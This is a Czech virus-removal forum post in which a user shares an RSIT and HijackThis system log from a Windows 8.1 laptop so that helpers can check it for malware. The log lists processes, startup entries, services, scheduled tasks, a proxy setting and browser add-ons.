Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.

Navštivte: Obrázek

e-mail: rudy(zavináč)forum.viry.cz

Varování:
Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!


Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.

rivano
Návštěvník
Návštěvník
Příspěvky: 93
Registrován: 18 dub 2009 08:33

Re: Prosím o kontrolu logu

#7 Příspěvek od rivano »

Logfile of random's system information tool 1.16 (written by random/random)
Run by Eva Blažková at 2017-07-18 08:37:48
Microsoft Windows 8.1 s aplikací Bing
System drive C: has 393 GB (86%) free of 459 GB
Total RAM: 3979 MB (70% free)
X64

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 8:37:52, on 18. 7. 2017
Platform: Unknown Windows (WinNT 6.02.1008)
MSIE: Internet Explorer v11.0 (11.00.9600.18123)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\TeamViewer\TeamViewer.exe
C:\Program Files\AVAST Software\Avast\AvastUI.exe
C:\Program Files\trend micro\Eva Blažková_RSITx64.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://acer13.msn.com/?pc=ACJB
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.seznam.cz/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/p/?LinkId=255141
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/p/?LinkId=255141
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyServer = 85.92.34.96:80
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: Canon Easy-WebPrint EX BHO - {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll
O2 - BHO: ExplorerBHO Class - {449D0D6E-2412-4E61-B68F-1CB625CD9E52} - C:\Program Files\Classic Shell\ClassicExplorer32.dll
O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\PROGRA~2\MICROS~2\Office14\GROOVEEX.DLL
O2 - BHO: avast! Online Security - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll
O2 - BHO: URLRedirectionBHO - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\PROGRA~2\MICROS~2\Office14\URLREDIR.DLL
O2 - BHO: ClassicIEBHO Class - {EA801577-E6AD-4BD5-8F71-4BE0154331A4} - C:\Program Files\Classic Shell\ClassicIEDLL_32.dll
O3 - Toolbar: Classic Explorer Bar - {553891B7-A0D5-4526-BE18-D3CE461D6310} - C:\Program Files\Classic Shell\ClassicExplorer32.dll
O3 - Toolbar: Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll
O4 - HKLM\..\Run: [seznam-listicka-distribuce] "C:\Program Files (x86)\Seznam.cz\distribution\szninstall.exe" -s -d listicka 1 szn-software-listicka cz.seznam.software.autoupdate
O4 - HKLM\..\Run: [CanonQuickMenu] C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE /logon
O4 - HKLM\..\Run: [IJNetworkScannerSelectorEX] C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe /FORCE
O4 - HKCU\..\Run: [cz.seznam.software.autoupdate] "C:\Users\Eva Blažková\AppData\Roaming\Seznam.cz\szninstall.exe" -c
O4 - HKCU\..\Run: [cz.seznam.software.szndesktop] "C:\Users\Eva Blažková\AppData\Roaming\Seznam.cz\bin\wszndesktop.exe" -q
O4 - HKLM\..\Policies\Explorer\Run: [BtvStack] "C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\BtvStack.exe"
O4 - Startup: Výřezy obrazovky a spuštění aplikace OneNote 2010.lnk = C:\Program Files\Microsoft Office\Office14\ONENOTEM.EXE
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office15\EXCEL.EXE/3000
O8 - Extra context menu item: E&xportovat do aplikace Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office14\EXCEL.EXE/3000
O8 - Extra context menu item: Od&eslat do aplikace OneNote - res://C:\PROGRA~1\MICROS~2\Office14\ONBttnIE.dll/105
O8 - Extra context menu item: Se&nd to OneNote - res://C:\PROGRA~1\MICROS~2\Office15\ONBttnIE.dll/105
O9 - Extra button: Odeslat do aplikace OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: Od&eslat do aplikace OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
O9 - Extra button: (no name) - {56753E59-AF1D-4FBA-9E15-31557124ADA2} - C:\Program Files\Classic Shell\ClassicIE_32.exe
O9 - Extra 'Tools' menuitem: Classic IE Settings - {56753E59-AF1D-4FBA-9E15-31557124ADA2} - C:\Program Files\Classic Shell\ClassicIE_32.exe
O9 - Extra button: P&ropojené poznámky aplikace OneNote - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
O9 - Extra 'Tools' menuitem: P&ropojené poznámky aplikace OneNote - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O18 - Filter hijack: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
O23 - Service: 602Updater (602XML Updater) - Software602 a.s. - C:\Program Files (x86)\Common Files\soft602\602updsvc\602updsvc.exe
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - c:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\WINDOWS\System32\alg.exe (file missing)
O23 - Service: aswbIDSAgent - AVAST Software s.r.o. - C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe
O23 - Service: AtherosSvc - Windows (R) Win 7 DDK provider - C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\adminservice.exe
O23 - Service: Avast Antivirus (avast! Antivirus) - AVAST Software - C:\Program Files\AVAST Software\Avast\AvastSvc.exe
O23 - Service: Intel(R) Content Protection HECI Service (cphs) - Intel Corporation - C:\WINDOWS\SysWow64\IntelCpHeciSvc.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\WINDOWS\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\WINDOWS\system32\fxssvc.exe (file missing)
O23 - Service: GamesAppIntegrationService - WildTangent - C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe
O23 - Service: GamesAppService - WildTangent, Inc. - C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe
O23 - Service: HP Support Solutions Framework Service (HPSupportSolutionsFrameworkService) - HP Inc. - C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
O23 - Service: Intel(R) Integrated Clock Controller Service - Intel(R) ICCS (ICCS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Integrated Clock Controller Service\ICCProxy.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\WINDOWS\system32\IEEtwCollector.exe (file missing)
O23 - Service: Intel(R) HD Graphics Control Panel Service (igfxCUIService1.0.0.0) - Unknown owner - C:\WINDOWS\system32\igfxCUIService.exe (file missing)
O23 - Service: Canon Inkjet Printer/Scanner/Fax Extended Survey Program (IJPLMSVC) - Unknown owner - C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE
O23 - Service: Intel(R) Capability Licensing Service Interface - Intel(R) Corporation - C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe
O23 - Service: Intel(R) Capability Licensing Service TCP IP Interface - Intel(R) Corporation - C:\Program Files\Intel\TXE Components\TCS\SocketHeciServer.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\WINDOWS\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Quick Access Service (QASvc) - Acer Incorporate - C:\Program Files\Acer\Acer Quick Access\QASvc.exe
O23 - Service: Quick Access RadioMgr Service (RMSvc) - Acer Incorporate - C:\Program Files\Acer\Acer Quick Access\RMSvc.exe
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\WINDOWS\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\WINDOWS\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\WINDOWS\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\WINDOWS\system32\sppsvc.exe (file missing)
O23 - Service: SInstalátor (ssinstall) - PS Media s.r.o. - C:\WINDOWS\SysWOW64\ssins.exe
O23 - Service: TeamViewer 11 (TeamViewer) - TeamViewer GmbH - C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
O23 - Service: User Experience Improvement Program (UEIPSvc) - acer - C:\Program Files\Acer\User Experience Improvement Program\Framework\UBTService.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\WINDOWS\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\WINDOWS\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\WINDOWS\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\WINDOWS\system32\wbengine.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-320 (WdNisSvc) - Unknown owner - C:\Program Files (x86)\Windows Defender\NisSrv.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-310 (WinDefend) - Unknown owner - C:\Program Files (x86)\Windows Defender\MsMpEng.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\WINDOWS\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 10682 bytes

====== Enumerating Processes ======

C:\WINDOWS\system32\wininit.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\svchost.exe -k DcomLaunch
C:\WINDOWS\system32\svchost.exe -k RPCSS
C:\WINDOWS\system32\dwm.exe
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\WINDOWS\system32\igfxCUIService.exe
C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k NetworkService
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\System32\spoolsv.exe
C:\WINDOWS\system32\svchost.exe -k LocalServiceNoNetwork
C:\WINDOWS\system32\taskhostex.exe
"C:\Program Files (x86)\Common Files\soft602\602updsvc\602updsvc.exe"
"c:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
"C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\adminservice.exe"
C:\WINDOWS\System32\svchost.exe -k utcsvc
C:\WINDOWS\system32\dashost.exe
"C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE"
"C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe"
C:\WINDOWS\SysWOW64\ssins.exe
C:\WINDOWS\system32\svchost.exe -k imgsvc
"C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe"
C:\WINDOWS\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
"C:\Program Files (x86)\TeamViewer\TeamViewer.exe"
"C:\Program Files\Acer\Acer Quick Access\QASvc.exe"
C:\WINDOWS\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\WINDOWS\system32\igfxHK.exe
"C:\Program Files\Acer\Acer Quick Access\QAEvent.exe"
C:\WINDOWS\system32\igfxTray.exe
C:\WINDOWS\system32\wbem\unsecapp.exe -Embedding
C:\WINDOWS\system32\wbem\wmiprvse.exe
"C:\Program Files (x86)\TeamViewer\tv_w32.exe" --action hooks --log C:\Program Files (x86)\TeamViewer\TeamViewer11_Logfile.log
"C:\Program Files (x86)\TeamViewer\tv_x64.exe" --action hooks --log C:\Program Files (x86)\TeamViewer\TeamViewer11_Logfile.log
"C:\WINDOWS\system32\igfxEM.exe" -Embedding
"C:\Program Files\Acer\Acer Quick Access\QAMsg.exe"
C:\WINDOWS\system32\SearchIndexer.exe /Embedding
"C:\WINDOWS\notepad.exe" C:\_OTM\MovedFiles\07182017_083020.log
"C:\Program Files\Acer\Acer Quick Access\RMSvc.exe"
"C:\Program Files\Acer\Acer Quick Access\QuickAccess.exe" -hide
C:\Program Files\Classic Shell\ClassicStartMenu.exe
"C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\BtvStack.exe"
C:\Program Files\AVAST Software\Avast\AvastUI.exe
"C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\ActivateDesktop.exe"
"C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe"
"C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe"
C:\WINDOWS\system32\wbem\wmiprvse.exe
"C:\Users\Eva Blažková\Desktop\RSITx64.exe"

====== Scheduled tasks folder ======

C:\WINDOWS\system32\tasks\Adobe Acrobat Update Task - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
C:\WINDOWS\system32\tasks\Adobe Flash Player Updater - C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
C:\WINDOWS\system32\tasks\ALU - C:\Program Files (x86)\Acer\Live Updater\updater.exe -auto
C:\WINDOWS\system32\tasks\ALUAgent - C:\Program Files (x86)\Acer\Live Updater\liveupdater_agent.exe
C:\WINDOWS\system32\tasks\Avast Emergency Update - C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe
C:\WINDOWS\system32\tasks\CCleanerSkipUAC - "C:\Program Files\CCleaner\CCleaner.exe" $(Arg0)
C:\WINDOWS\system32\tasks\Quick Access - "C:\Program Files\Acer\Acer Quick Access\QALauncher.exe"
C:\WINDOWS\system32\tasks\Quick Access Quick Launcher - "C:\Program Files\Acer\Acer Quick Access\QALauncher.exe" -noui -normsvc
C:\WINDOWS\system32\tasks\SafeZone scheduled Autoupdate 1452595167 - C:\Program Files\AVAST Software\SZBrowser\launcher.exe --scheduledautoupdate
C:\WINDOWS\system32\tasks\SafeZone scheduled Autoupdate 1458760155 - C:\Program Files\AVAST Software\SZBrowser\launcher.exe --scheduledautoupdate $(Arg0)
C:\WINDOWS\system32\tasks\Trigger KMS Activation - "C:\Program Files\KMSnano\TriggerKMS.exe" 31 "silent.cmd"
C:\WINDOWS\system32\tasks\UbtFrameworkService - "C:\Program Files\Acer\User Experience Improvement Program\Framework\TriggerFramework.exe"
C:\WINDOWS\system32\tasks\WPD\SqmUpload_S-1-5-21-3699476140-735458878-2518942289-1001 - %windir%\system32\rundll32.exe portabledeviceapi.dll,#1
C:\WINDOWS\system32\tasks\Recovery Management\Notification - C:\Program Files\Acer\Acer Recovery Management\Notification\Notification.exe
C:\WINDOWS\system32\tasks\OfficeSoftwareProtectionPlatform\SvcRestartTask - %systemroot%\system32\sc.exe start osppsvc
C:\WINDOWS\system32\tasks\Microsoft\Windows\WS\License Validation - rundll32.exe WSClient.dll,WSpTLR licensing
C:\WINDOWS\system32\tasks\Microsoft\Windows\WS\WSRefreshBannedAppsListTask - rundll32.exe WSClient.dll,RefreshBannedAppsList
C:\WINDOWS\system32\tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join - %SystemRoot%\System32\AutoWorkplace.exe join
C:\WINDOWS\system32\tasks\Microsoft\Windows\WindowsUpdate\Scheduled Start - C:\WINDOWS\system32\sc.exe start wuauserv
C:\WINDOWS\system32\tasks\Microsoft\Windows\WindowsUpdate\Scheduled Start With Network - C:\WINDOWS\system32\sc.exe start wuauserv
C:\WINDOWS\system32\tasks\Microsoft\Windows\Windows Media Sharing\UpdateLibrary - "%ProgramFiles%\Windows Media Player\wmpnscfg.exe"
C:\WINDOWS\system32\tasks\Microsoft\Windows\Windows Filtering Platform\BfeOnServiceStartTypeChange - %windir%\system32\rundll32.exe bfe.dll,BfeOnServiceStartTypeChange
C:\WINDOWS\system32\tasks\Microsoft\Windows\Windows Error Reporting\QueueReporting - %windir%\system32\wermgr.exe -queuereporting
C:\WINDOWS\system32\tasks\Microsoft\Windows\UPnP\UPnPHostConfig - sc.exe config upnphost start= auto
C:\WINDOWS\system32\tasks\Microsoft\Windows\Time Zone\SynchronizeTimeZone - %windir%\system32\tzsync.exe
C:\WINDOWS\system32\tasks\Microsoft\Windows\Time Synchronization\SynchronizeTime - %windir%\system32\sc.exe start w32time task_started
C:\WINDOWS\system32\tasks\Microsoft\Windows\SystemRestore\SR - %windir%\system32\srtasks.exe ExecuteScheduledSPPCreation
C:\WINDOWS\system32\tasks\Microsoft\Windows\Sysmain\WsSwapAssessmentTask - %windir%\system32\rundll32.exe sysmain.dll,PfSvWsSwapAssessmentTask
C:\WINDOWS\system32\tasks\Microsoft\Windows\SpacePort\SpaceAgentTask - %windir%\system32\SpaceAgent.exe
C:\WINDOWS\system32\tasks\Microsoft\Windows\Shell\FamilySafetyMonitor - %windir%\System32\wpcmon.exe
C:\WINDOWS\system32\tasks\Microsoft\Windows\RemovalTools\MRT_HB - C:\WINDOWS\system32\MRT.exe /EHB /Q
C:\WINDOWS\system32\tasks\Microsoft\Windows\RemoteAssistance\RemoteAssistanceTask - %windir%\system32\RAServer.exe /offerraupdate
C:\WINDOWS\system32\tasks\Microsoft\Windows\Plug and Play\Sysprep Generalize Drivers - %SystemRoot%\System32\drvinst.exe 6
C:\WINDOWS\system32\tasks\Microsoft\Windows\NetTrace\GatherNetworkInfo - %windir%\system32\gatherNetworkInfo.vbs
C:\WINDOWS\system32\tasks\Microsoft\Windows\MUI\LPRemove - %windir%\system32\lpremove.exe
C:\WINDOWS\system32\tasks\Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser - %SystemRoot%\System32\MbaeParserTask.exe
C:\WINDOWS\system32\tasks\Microsoft\Windows\Location\Notifications - %windir%\System32\LocationNotifications.exe
C:\WINDOWS\system32\tasks\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector - %windir%\system32\rundll32.exe dfdts.dll,DfdGetDefaultPolicyAndSMART
C:\WINDOWS\system32\tasks\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticResolver - %windir%\system32\DFDWiz.exe
C:\WINDOWS\system32\tasks\Microsoft\Windows\DiskCleanup\SilentCleanup - %windir%\system32\cleanmgr.exe /autoclean /d %systemdrive%
C:\WINDOWS\system32\tasks\Microsoft\Windows\Defrag\ScheduledDefrag - %windir%\system32\defrag.exe -c -h -o -$
C:\WINDOWS\system32\tasks\Microsoft\Windows\Customer Experience Improvement Program\Consolidator - %SystemRoot%\System32\wsqmcons.exe
C:\WINDOWS\system32\tasks\Microsoft\Windows\Customer Experience Improvement Program\Uploader - %windir%\system32\WSqmCons.exe -u
C:\WINDOWS\system32\tasks\Microsoft\Windows\Bluetooth\UninstallDeviceTask - BthUdTask.exe $(Arg0)
C:\WINDOWS\system32\tasks\Microsoft\Windows\Autochk\Proxy - %windir%\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations
C:\WINDOWS\system32\tasks\Microsoft\Windows\AppxDeploymentClient\Pre-staged app cleanup - %windir%\system32\rundll32.exe %windir%\system32\AppxDeploymentClient.dll,AppxPreStageCleanupRunTask
C:\WINDOWS\system32\tasks\Microsoft\Windows\ApplicationData\CleanupTemporaryState - %windir%\system32\rundll32.exe Windows.Storage.ApplicationData.dll,CleanupTemporaryState
C:\WINDOWS\system32\tasks\Microsoft\Windows\Application Experience\AitAgent - aitagent /increment
C:\WINDOWS\system32\tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser - %windir%\system32\compattel\DiagTrackRunner.exe /UploadEtlFilesOnly
C:\WINDOWS\system32\tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater - %windir%\system32\rundll32.exe %windir%\system32\invagent.dll,RunUpdate
C:\WINDOWS\system32\tasks\Microsoft\Windows\Application Experience\StartupAppTask - %windir%\system32\rundll32.exe Startupscan.dll,SusRunTask
C:\WINDOWS\system32\tasks\Microsoft\Windows\AppID\PolicyConverter - %windir%\system32\appidpolicyconverter.exe
C:\WINDOWS\system32\tasks\Microsoft\Windows\AppID\VerifiedPublisherCertStoreCheck - %windir%\system32\appidcertstorecheck.exe
C:\WINDOWS\system32\tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report - C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe /send
C:\WINDOWS\system32\tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater - C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe /f
C:\WINDOWS\system32\tasks\AVAST Software\Avast settings backup - C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe /backup /iavs

=========Mozilla firefox=========

ProfilePath - C:\Users\Eva Blažková\AppData\Roaming\Mozilla\Firefox\Profiles\n44035f3.default

prefs.js - "browser.search.useDBForOrder" - true
prefs.js - "browser.startup.homepage" - "http:/seznam.cz"

"wrc@avast.com"=C:\Program Files\AVAST Software\Avast\WebRep\FF48
"sp@avast.com"=C:\Program Files\AVAST Software\Avast\SafePrice\FF48


[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@adobe.com/FlashPlayer]
"Description"=Adobe® Flash® Player 26.0.0.137 Plugin
"Path"=C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_26_0_0_137.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@canon.com/EPPEX]
"Description"=Canon My Image Garden
"Path"=C:\Program Files (x86)\Canon\My Image Garden\AddOn\CIG\npmigfpi.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0]
"Description"=Ag Player Plugin
"Path"=c:\Program Files (x86)\Microsoft Silverlight\5.1.50907.0\npctrl.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0]
"Description"=Office Authorization plug-in for NPAPI browsers
"Path"=C:\PROGRA~2\MICROS~2\Office14\NPAUTHZ.DLL

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@microsoft.com/SharePoint,version=14.0]
"Description"=Microsoft SharePoint Plug-in for Firefox
"Path"=C:\PROGRA~2\MICROS~2\Office14\NPSPWRAP.DLL

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@software602.cz/602XML Filler]
"Description"=602XML Filler Plugin
"Path"=C:\Program Files (x86)\Software602\602XML\Filler\npfiller.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.0.1]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.1.5]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.1]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.2]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.3]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.4]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.6]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@WildTangent.com/GamesAppPresenceDetector,Version=1.0]
"Description"=WildTangent Games App V2 Presence Detector Plugin
"Path"=C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\Adobe Reader]
"Description"=Handles PDFs in-place in Firefox
"Path"=C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll


[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@adobe.com/FlashPlayer]
"Description"=Adobe® Flash® Player 26.0.0.137 Plugin
"Path"=C:\WINDOWS\system32\Macromed\Flash\NPSWF64_26_0_0_137.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0]
"Description"=Ag Player Plugin
"Path"=c:\Program Files\Microsoft Silverlight\5.1.50907.0\npctrl.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0]
"Description"=Office Authorization plug-in for NPAPI browsers
"Path"=C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL


C:\Users\Eva Blažková\AppData\Roaming\Mozilla\Firefox\Profiles\n44035f3.default\extensions\
{ea614400-e918-4741-9a97-7a972ff7c30b}

C:\Users\Eva Blažková\AppData\Roaming\Mozilla\Firefox\Profiles\n44035f3.default\addons.json
Adblock Plus - extension - {d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}
Seznam lištička - extension - {ea614400-e918-4741-9a97-7a972ff7c30b}
uBlock Origin - extension - uBlock0@raymondhill.net

C:\Users\Eva Blažková\AppData\Roaming\Mozilla\Firefox\Profiles\n44035f3.default\extensions.json
Avast Online Security - webextension - wrc@avast.com - C:\Program Files\AVAST Software\Avast\WebRep\FF48
Avast SafePrice - webextension - sp@avast.com - C:\Program Files\AVAST Software\Avast\SafePrice\FF48
Seznam lištička - extension - {ea614400-e918-4741-9a97-7a972ff7c30b} - C:\Users\Eva Blažková\AppData\Roaming\Mozilla\Firefox\Profiles\n44035f3.default\extensions\{ea614400-e918-4741-9a97-7a972ff7c30b}
